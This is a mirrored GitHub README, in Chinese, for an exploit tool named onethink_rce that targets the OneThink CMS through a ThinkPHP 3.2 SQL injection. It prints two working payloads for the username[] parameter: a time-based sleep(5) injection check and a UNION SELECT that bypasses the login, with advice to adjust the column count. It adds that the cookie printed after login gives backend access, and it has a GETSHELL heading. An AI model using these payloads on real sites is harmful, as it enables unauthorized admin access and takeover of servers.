Code Monkey home page Code Monkey logo

onethink_rce's Introduction

onethink_rce

十一假期看到的文章https://forum.90sec.com/t/topic/464

原理其实还是p牛发的那个thinkphp3.2注入漏洞,于是又简单的分析了一下。

写了一下利用工具。

需要注意的地方: 1、url = "http://www.xxx.com" 不解释
2、print(s.cookies) 如果登录成功,那么这个打印出来的cookie就有用,替换cookie即可进入后台 3、payload 中的 ('username[]','like 1)and 1 in (2) or sleep(5)#'), 为注入漏洞的延时检测。 ('username[]','like 1)and 1 in (2) union select 1,2,"",4,5,6,7,8,9,10,11#'), 为绕过验证登录语句 字段数默认为11,我也见过13的。大家自行修改。

GETSHELL:

onethink_rce's People

Contributors

yuxiaokui avatar

Forkers

youran22-2

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.